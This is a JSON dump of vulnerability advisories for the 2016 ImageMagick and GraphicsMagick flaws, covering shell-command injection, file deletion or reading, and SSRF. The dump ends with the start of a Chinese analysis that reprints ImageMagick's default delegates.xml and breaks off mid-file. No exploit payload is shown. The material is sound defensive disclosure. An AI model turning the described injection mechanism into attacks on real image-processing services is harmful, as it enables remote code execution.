"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:38:55", "description": "This update for ImageMagick fixes the following issues:\n\n The update disables various insecure coders [boo#978061] These fix issues\n tracked in CVE-2016-3714, CVE-2016-3715, CVE-2016-3716, CVE-2016-3717,\n CVE-2016-3718\n\n", "cvss3": {}, "published": "2016-05-07T14:07:41", "type": "suse", "title": "Security update for ImageMagick (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-07T14:07:41", "id": "OPENSUSE-SU-2016:1261-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00025.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:38:55", "description": "This update for ImageMagick fixes the following issues:\n\n Security issues fixed:\n - Several coders were vulnerable to remote code execution attacks, these\n coders have now been disabled by default but can be re-enabled by\n editing &quot;/etc/ImageMagick-*/policy.xml&quot; (bsc#978061)\n - CVE-2016-3714: Insufficient shell characters filtering leads to\n (potentially remote) code execution\n - CVE-2016-3715: Possible file deletion by using ImageMagick's 'ephemeral'\n pseudo protocol which deletes files after reading.\n - CVE-2016-3716: Possible file moving by using ImageMagick's 'msl' pseudo\n protocol with any extension in any folder.\n - CVE-2016-3717: Possible local file read by using ImageMagick's 'label'\n pseudo protocol to get content of the files from the server.\n - CVE-2016-3718: Possible Server Side Request Forgery (SSRF) to make HTTP\n GET or FTP request.\n\n Bugs fixed:\n - Use external svg loader (rsvg)\n\n This update was imported from the SUSE:SLE-12:Update update project.\n\n", "cvss3": {}, "published": "2016-05-07T18:07:43", "type": "suse", "title": "Security update for ImageMagick (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-07T18:07:43", "id": "OPENSUSE-SU-2016:1266-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00028.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:38:55", "description": "This update for ImageMagick fixes the following issues:\n\n Security issues fixed:\n - Several coders were vulnerable to remote code execution attacks, these\n coders have now been disabled. They can be re-enabled by exporting the\n following environment variable\n MAGICK_CODER_MODULE_PATH=/usr/lib64/ImageMagick-6.4.3/modules-Q16/coders/vu\n lnerable/ (bsc#978061)\n - CVE-2016-3714: Insufficient shell characters filtering leads to\n (potentially remote) code execution\n - CVE-2016-3715: Possible file deletion by using ImageMagick's 'ephemeral'\n pseudo protocol which deletes files after reading.\n - CVE-2016-3716: Possible file moving by using ImageMagick's 'msl' pseudo\n protocol with any extension in any folder.\n - CVE-2016-3717: Possible local file read by using ImageMagick's 'label'\n pseudo protocol to get content of the files from the server.\n - CVE-2016-3718: Possible Server Side Request Forgery (SSRF) to make HTTP\n GET or FTP request.\n\n Bugs fixed:\n - Use external svg loader (rsvg)\n\n", "cvss3": {}, "published": "2016-05-11T17:08:09", "type": "suse", "title": "Security update for ImageMagick (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-11T17:08:09", "id": "SUSE-SU-2016:1275-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00032.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:38:46", "description": "This update for GraphicsMagick fixes the following issues:\n\n Security issues fixed:\n - Multiple security issues in GraphicsMagick/ImageMagick [boo#978061]\n (CVE-2016-3714, CVE-2016-3718, CVE-2016-3715, CVE-2016-3717)\n\n", "cvss3": {}, "published": "2016-05-18T14:08:13", "type": "suse", "title": "Security update for GraphicsMagick (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-18T14:08:13", "id": "OPENSUSE-SU-2016:1326-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00051.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:38:47", "description": "This update for GraphicsMagick fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2017-8350: The PNG/JNG decoder recieved an incremental fix, fixing\n some related issues in the same code. (bsc#1036985)\n - CVE-2017-9439: A memory leak was found in the function ReadPDBImage\n incoders/pdb.c (bsc#1042826)\n - CVE-2017-9501: An assertion failure could cause a denial of service via\n a crafted file (bsc#1043289)\n - CVE-2017-11403: The ReadMNGImage function in coders/png.c has an\n out-of-order CloseBlob call, resulting in a use-after-free via a crafted\n file (bsc#1049072)\n - CVE-2017-11643: A heap overflow in WriteCMYKImage()function in\n coders/cmyk.c was fixed (bsc#1050611)\n - CVE-2017-11636: A heap overflow in WriteRGBImage() in coders/rgb.c was\n fixed (bsc#1050674)\n\n", "cvss3": {}, "published": "2017-08-22T18:07:53", "type": "suse", "title": "Security update for GraphicsMagick (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2017-9501", "CVE-2017-11636", "CVE-2017-11643", "CVE-2017-11403", "CVE-2017-8350", "CVE-2017-9439"], "modified": "2017-08-22T18:07:53", "id": "SUSE-SU-2017:2229-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-08/msg00059.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2021-06-08T18:38:55", "description": "[6.7.2.7-4]\n- Add fix for CVE-2016-3714, CVE-2016-3715, CVE-2016-3716 and CVE-2016-3717", "edition": 2, "cvss3": {}, "published": "2016-05-09T00:00:00", "type": "oraclelinux", "title": "ImageMagick security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2016-05-09T00:00:00", "id": "ELSA-2016-0726", "href": "http://linux.oracle.com/errata/ELSA-2016-0726.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2021-10-19T18:36:48", "description": "ImageMagick is an image display and manipulation tool for the X Window System that can read and write multiple image formats.\n\nSecurity Fix(es):\n\n* It was discovered that ImageMagick did not properly sanitize certain input before passing it to the delegate functionality. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application. (CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to delete, move, or disclose the contents of arbitrary files. (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way ImageMagick processed certain images. A remote attacker could exploit this flaw to mislead an application using ImageMagick or an unsuspecting user using the ImageMagick utilities into, for example, performing HTTP(S) requests or opening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL coders. If you experience any problems after the update, it may be necessary to manually adjust the policy.xml file to match your requirements. Please take additional precautions to ensure that your applications using the ImageMagick library do not process malicious or untrusted files before doing so.", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-09T16:56:15", "type": "redhat", "title": "(RHSA-2016:0726) Important: ImageMagick security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2018-06-06T16:24:27", "id": "RHSA-2016:0726", "href": "https://access.redhat.com/errata/RHSA-2016:0726", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2022-03-12T09:33:49", "description": "New imagemagick packages are available for Slackware 14.0, 14.1, and -current\nto fix security issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/imagemagick-6.8.6_10-i486-2_slack14.1.txz: Rebuilt.\n This update addresses several security issues in ImageMagick, including:\n Insufficient shell characters filtering allows code execution (CVE-2016-3714)\n Server Side Request Forgery (CVE-2016-3718)\n File deletion (CVE-2016-3715)\n File moving (CVE-2016-3716)\n Local file read (CVE-2016-3717)\n To mitigate these issues, the default policy.xml config file has been\n modified to disable all of the vulnerable coders.\n For more information, see:\n https://imagetragick.com\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3714\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3718\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3715\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3716\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3717\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/imagemagick-6.7.7_10-i486-2_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/imagemagick-6.7.7_10-x86_64-2_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/imagemagick-6.8.6_10-i486-2_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/imagemagick-6.8.6_10-x86_64-2_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/imagemagick-6.9.4_1-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/imagemagick-6.9.4_1-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\ne78d8825fc122e9411b9bbde341ce8da imagemagick-6.7.7_10-i486-2_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n20bbb69e3a774f9493b3c87a90692b8f imagemagick-6.7.7_10-x86_64-2_slack14.0.txz\n\nSlackware 14.1 package:\n26aa6ce379628b85df0818b17d5b855d imagemagick-6.8.6_10-i486-2_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n3060644c634984224e448ecd03bd0eb1 imagemagick-6.8.6_10-x86_64-2_slack14.1.txz\n\nSlackware -current package:\n7add4b4c162a9e59ae309ea38430e44e xap/imagemagick-6.9.4_1-i586-1.txz\n\nSlackware x86_64 -current package:\n73a376cb32a9fbf529340982dfdb9b88 xap/imagemagick-6.9.4_1-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg imagemagick-6.8.6_10-i486-2_slack14.1.txz", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-11T06:33:30", "type": "slackware", "title": "[slackware-security] imagemagick", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2016-05-11T06:33:30", "id": "SSA-2016-132-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.440568", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-14T20:45:04", "description": "New imagemagick packages are available for Slackware 14.0, 14.1, and -current\nto fix security issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/imagemagick-6.8.6_10-i486-2_slack14.1.txz: Rebuilt.\n This update addresses several security issues in ImageMagick, including:\n Insufficient shell characters filtering allows code execution (CVE-2016-3714)\n Server Side Request Forgery (CVE-2016-3718)\n File deletion (CVE-2016-3715)\n File moving (CVE-2016-3716)\n Local file read (CVE-2016-3717)\n To mitigate these issues, the default policy.xml config file has been\n modified to disable all of the vulnerable coders.\n For more information, see:\n https://imagetragick.com\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3714\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3718\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3715\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3716\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3717\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/imagemagick-6.7.7_10-i486-2_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/imagemagick-6.7.7_10-x86_64-2_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/imagemagick-6.8.6_10-i486-2_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/imagemagick-6.8.6_10-x86_64-2_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/imagemagick-6.9.4_1-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/imagemagick-6.9.4_1-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\ne78d8825fc122e9411b9bbde341ce8da imagemagick-6.7.7_10-i486-2_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n20bbb69e3a774f9493b3c87a90692b8f imagemagick-6.7.7_10-x86_64-2_slack14.0.txz\n\nSlackware 14.1 package:\n26aa6ce379628b85df0818b17d5b855d imagemagick-6.8.6_10-i486-2_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n3060644c634984224e448ecd03bd0eb1 imagemagick-6.8.6_10-x86_64-2_slack14.1.txz\n\nSlackware -current package:\n7add4b4c162a9e59ae309ea38430e44e xap/imagemagick-6.9.4_1-i586-1.txz\n\nSlackware x86_64 -current package:\n73a376cb32a9fbf529340982dfdb9b88 xap/imagemagick-6.9.4_1-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg imagemagick-6.8.6_10-i486-2_slack14.1.txz", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-11T06:33:30", "type": "slackware", "title": "[slackware-security] imagemagick", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2016-05-11T06:33:30", "id": "SSA-2016-132-01-IMAGEMAGICK", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.440568", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:12:00", "description": "\u8be6\u60c5\u6765\u6e90\uff1a[CVE-2016-3714 - ImageMagick \u547d\u4ee4\u6267\u884c\u5206\u6790 - \u4e4c\u4e91\u77e5\u8bc6\u5e93](http://drops.wooyun.org/papers/15589)\r\n\r\nImageMagick\u662f\u4e00\u6b3e\u4f7f\u7528\u91cf\u5f88\u5e7f\u7684\u56fe\u7247\u5904\u7406\u7a0b\u5e8f\uff0c\u5f88\u591a\u5382\u5546\u90fd\u8c03\u7528\u4e86\u8fd9\u4e2a\u7a0b\u5e8f\u8fdb\u884c\u56fe\u7247\u5904\u7406\uff0c\u5305\u62ec\u56fe\u7247\u7684\u4f38\u7f29\u3001\u5207\u5272\u3001\u6c34\u5370\u3001\u683c\u5f0f\u8f6c\u6362\u7b49\u7b49\u3002\u4f46\u8fd1\u6765\u6709\u7814\u7a76\u8005\u53d1\u73b0\uff0c\u5f53\u7528\u6237\u4f20\u5165\u4e00\u4e2a\u5305\u542b\u300e\u7578\u5f62\u5185\u5bb9\u300f\u7684\u56fe\u7247\u7684\u65f6\u5019\uff0c\u5c31\u6709\u53ef\u80fd\u89e6\u53d1\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\u3002\r\n\r\n\u56fd\u5916\u7684\u5b89\u5168\u4eba\u5458\u4e3a\u6b64\u65b0\u5efa\u4e86\u4e00\u4e2a\u7f51\u7ad9\uff1a https://imagetragick.com/ \uff0c\u4e0d\u5f97\u4e0d\u8bf4\uff0c\u6709\u4e9b\u5916\u56fd\u4eba\u86ee\u4f1a\u73a9\u7684\u3002\r\n\r\n\u76f8\u5bf9\u4e8e\u4e4b\u524d\u7684\u6570\u4e2a\u62e5\u6709\u300e\u4e3b\u9875\u300f\u7684\u6f0f\u6d1e\uff0c\u8fd9\u4e2a\u6d1e\u786e\u5b9e\u4e0d\u4e00\u822c\uff0c\u786e\u5b9e\u662f\u4e00\u4e2a\u53ef\u4ee5\u88ab\u5229\u7528\u7684\u597d\u6d1e\uff0c\u4e4c\u4e91\u4e3b\u7ad9\u4e0a\u4e5f\u7206\u51fa\u4e86\u6570\u4e2a\u88ab\u8be5\u6f0f\u6d1e\u5f71\u54cd\u7684\u5927\u5382\u5546\u3002\u6211\u4eec\u5148\u6765\u5206\u6790\u4e00\u4e0b\u5b83\u51fa\u73b0\u7684\u539f\u56e0\u3002\r\n\r\n### 0x01 \u539f\u7406\u5206\u6790\r\n\u4e0e\u8fd9\u4e2a\u6f0f\u6d1e\u76f8\u5173\u7684CVE\u6709CVE-2016-3714\u3001CVE-2016-3715\u3001CVE-2016-3716\u3001CVE-2016-3717\uff0c\u5176\u4e2d\u6700\u4e25\u91cd\u7684\u5c31\u662fCVE-2016-3714\uff0c\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\u53ef\u4ee5\u9020\u6210\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u7684\u5371\u5bb3\u3002\r\n\r\nImageMagick\u6709\u4e00\u4e2a\u529f\u80fd\u53eb\u505adelegate\uff08\u59d4\u6258\uff09\uff0c\u4f5c\u7528\u662f\u8c03\u7528\u5916\u90e8\u7684lib\u6765\u5904\u7406\u6587\u4ef6\u3002\u800c\u8c03\u7528\u5916\u90e8lib\u7684\u8fc7\u7a0b\u662f\u4f7f\u7528\u7cfb\u7edf\u7684system\u547d\u4ee4\u6765\u6267\u884c\u7684\uff08 https://github.com/ImageMagick/ImageMagick/blob/e93e339c0a44cec16c08d78241f7aa3754485004/MagickCore/delegate.c#L347 \uff09\r\n\r\n\u6211\u4eec\u5728ImageMagick\u7684\u9ed8\u8ba4\u914d\u7f6e\u6587\u4ef6\u91cc\u53ef\u4ee5\u770b\u5230\u6240\u6709\u7684\u59d4\u6258\uff1a /etc/ImageMagick/delegates.xml\r\n\r\n```\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<!DOCTYPE delegatemap [\r\n<!ELEMENT delegatemap (delegate)+>\r\n<!ELEMENT delegate (#PCDATA)>\r\n<!ATTLIST delegate decode CDATA #IMPLIED>\r\n<!ATTLIST delegate encode CDATA #IMPLIED>\r\n<!ATTLIST delegate mode CDATA #IMPLIED>\r\n<!ATTLIST delegate spawn CDATA #IMPLIED>\r\n<!ATTLIST delegate stealth CDATA #IMPLIED>\r\n<!ATTLIST delegate thread-support CDATA #IMPLIED>\r\n<!ATTLIST delegate command CDATA #REQUIRED>\r\n]>\r\n<!--\r\n Delegate command file.\r\n \r\n Commands which specify\r\n \r\n decode=\"in_format\" encode=\"out_format\"\r\n \r\n specify the rules for converting from in_format to out_format These\r\n rules may be used to translate directly between formats.\r\n \r\n Commands which specify only\r\n \r\n decode=\"in_format\"\r\n \r\n specify the rules for converting from in_format to some format that\r\n ImageMagick will automatically recognize. These rules are used to\r\n decode formats.\r\n \r\n Commands which specify only\r\n \r\n encode=\"out_format\"\r\n \r\n specify the rules for an \"encoder\" which may accept any input format.\r\n \r\n For delegates other than ps:*, pcl:*, and mpeg:* the substitution rules are\r\n as follows:\r\n \r\n %i input image filename\r\n %o output image filename\r\n %u unique temporary filename\r\n %Z unique temporary filename\r\n %# input image signature\r\n %b image file size\r\n %c input image comment\r\n %g image geometry\r\n %h image rows (height)\r\n %k input image number colors\r\n %l image label\r\n %m input image format\r\n %p page number\r\n %q input image depth\r\n %s scene number\r\n %w image columns (width)\r\n %x input image x resolution\r\n %y input image y resolution\r\n \r\n Set option delegate:bimodal=true to process bimodal delegates otherwise they\r\n are ignored.\r\n \r\n If stealth=\"True\" the delegate is not listed in user requested\r\n \"-list delegate\" listings. These are typically special internal delegates.\r\n \r\n If spawn=\"True\" ImageMagick will not way for the delegate to finish,\r\n nor will it read any output image. It will only wait for either the input\r\n file to be removed (See \"ephemeral:\" coder) indicating that the input file\r\n has been read, or a maximum time limit of 2 seconds.\r\n-->\r\n<delegatemap>\r\n <delegate decode=\"autotrace\" stealth=\"True\" command=\"&quot;convert&quot; &quot;%i&quot; &quot;pnm:%u&quot;\\n&quot;autotrace&quot; -input-format pnm -output-format svg -output-file &quot;%o&quot; &quot;%u&quot;\"/>\r\n <delegate decode=\"blender\" command=\"&quot;blender&quot; -b &quot;%i&quot; -F PNG -o &quot;%o&quot;&quot;\\n&quot;convert&quot; -concatenate &quot;%o*.png&quot; &quot;%o&quot;\"/>\r\n <delegate decode=\"browse\" stealth=\"True\" spawn=\"True\" command=\"&quot;xdg-open&quot; http://www.imagemagick.org/; rm &quot;%i&quot;\"/>\r\n <delegate decode=\"cdr\" command=\"&quot;uniconvertor&quot; &quot;%i&quot; &quot;%o.svg&quot;; mv &quot;%o.svg&quot; &quot;%o&quot;\"/>\r\n <delegate decode=\"cgm\" thread-support=\"False\" command=\"&quot;ralcgm&quot; -d ps -oC &lt; &quot;%i&quot; &gt; &quot;%o&quot; 2&gt; &quot;%Z&quot;\"/>\r\n <delegate decode=\"dvi\" command=\"&quot;dvips&quot; -q -o &quot;%o&quot; &quot;%i&quot;\"/>\r\n <delegate decode=\"dng:decode\" command=\"&quot;ufraw-batch&quot; --silent --create-id=also --out-type=png --out-depth=16 &quot;--output=%u.png&quot; &quot;%i&quot;\"/>\r\n <delegate decode=\"dot\" command='&quot;dot&quot; -Tsvg &quot;%i&quot; -o &quot;%o&quot;' />\r\n <delegate decode=\"edit\" stealth=\"True\" command=\"&quot;/etc/alternatives/x-terminal-emulator&quot; -title &quot;Edit Image Comment&quot; -e vi &quot;%o&quot;\"/>\r\n <delegate decode=\"eps\" encode=\"pdf\" mode=\"bi\" command=\"&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 &quot;-sDEVICE=pdfwrite&quot; &quot;-sOutputFile=%o&quot; &quot;-f%i&quot;\"/>\r\n <delegate decode=\"eps\" encode=\"ps\" mode=\"bi\" command=\"&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=nodevice&quot; &quot;-sOutputFile=%o&quot; &quot;-f%i&quot;\"/>\r\n <delegate decode=\"fig\" command=\"&quot;fig2dev&quot; -L ps &quot;%i&quot; &quot;%o&quot;\"/>\r\n <delegate decode=\"plt\" command=\"&quot;echo&quot; &quot;set size 1.25,0.62; set terminal postscript portrait color solid; set output \\'%o\\'; load \\'%i\\'&quot; &gt; &quot;%u&quot;;&quot;gnuplot&quot; &quot;%u&quot;\"/>\r\n <delegate decode=\"hpg\" command=\"&quot;hp2xx&quot; -q -m eps -f `basename &quot;%o&quot;` &quot;%i&quot;; mv -f `basename &quot;%o&quot;` &quot;%o&quot;\"/>\r\n <delegate decode=\"hpgl\" command=\"if [ -e hp2xx -o -e /usr/bin/hp2xx ]; then hp2xx -q -m eps -f `basename &quot;%o&quot;` &quot;%i&quot;; mv -f `basename &quot;%o&quot;` &quot;%o&quot;; else echo &quot;You need to install hp2xx to use HPGL files with ImageMagick.&quot;; exit 1; fi\"/>\r\n <delegate decode=\"htm\" command=\"&quot;html2ps&quot; -U -o &quot;%o&quot; &quot;%i&quot;\"/>\r\n <delegate decode=\"html\" command=\"&quot;html2ps&quot; -U -o &quot;%o&quot; &quot;%i&quot;\"/>\r\n <delegate decode=\"https\" command=\"&quot;curl&quot; -s -k -o &quot;%o&quot; &quot;https:%M&quot;\"/>\r\n <delegate decode=\"ilbm\" command=\"&quot;ilbmtoppm&quot; &quot;%i&quot; &gt; &quot;%o&quot;\"/>\r\n <delegate decode=\"man\" command=\"&quot;groff&quot; -man -Tps &quot;%i&quot; &gt; &quot;%o&quot;\"/>\r\n <delegate decode=\"mpeg:decode\" command=\"&quot;ffmpeg&quot; -v -1 -i &quot;%i&quot; -vframes %S -vcodec pam -an -f rawvideo -y &quot;%u.pam&quot; 2&gt; &quot;%Z&quot;\"/>\r\n <delegate encode=\"mpeg:encode\" stealth=\"True\" command=\"&quot;ffmpeg&quot; -v -1 -mbd rd -trellis 2 -cmp 2 -subcmp 2 -g 300 -i &quot;%M%%d.jpg&quot; &quot;%u.%m&quot; 2&gt; &quot;%Z&quot;\"/>\r\n <delegate decode=\"sid\" command=\"&quot;mrsidgeodecode&quot; -if sid -i &quot;%i&quot; -of tif -o &quot;%o&quot; &gt; &quot;%u&quot;\"/>\r\n <delegate decode=\"pcl:color\" stealth=\"True\" command=\"&quot;pcl6&quot; -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=ppmraw&quot; -dTextAlphaBits=%u -dGraphicsAlphaBits=%u &quot;-r%s&quot; %s &quot;-sOutputFile=%s&quot; &quot;%s&quot;\"/>\r\n 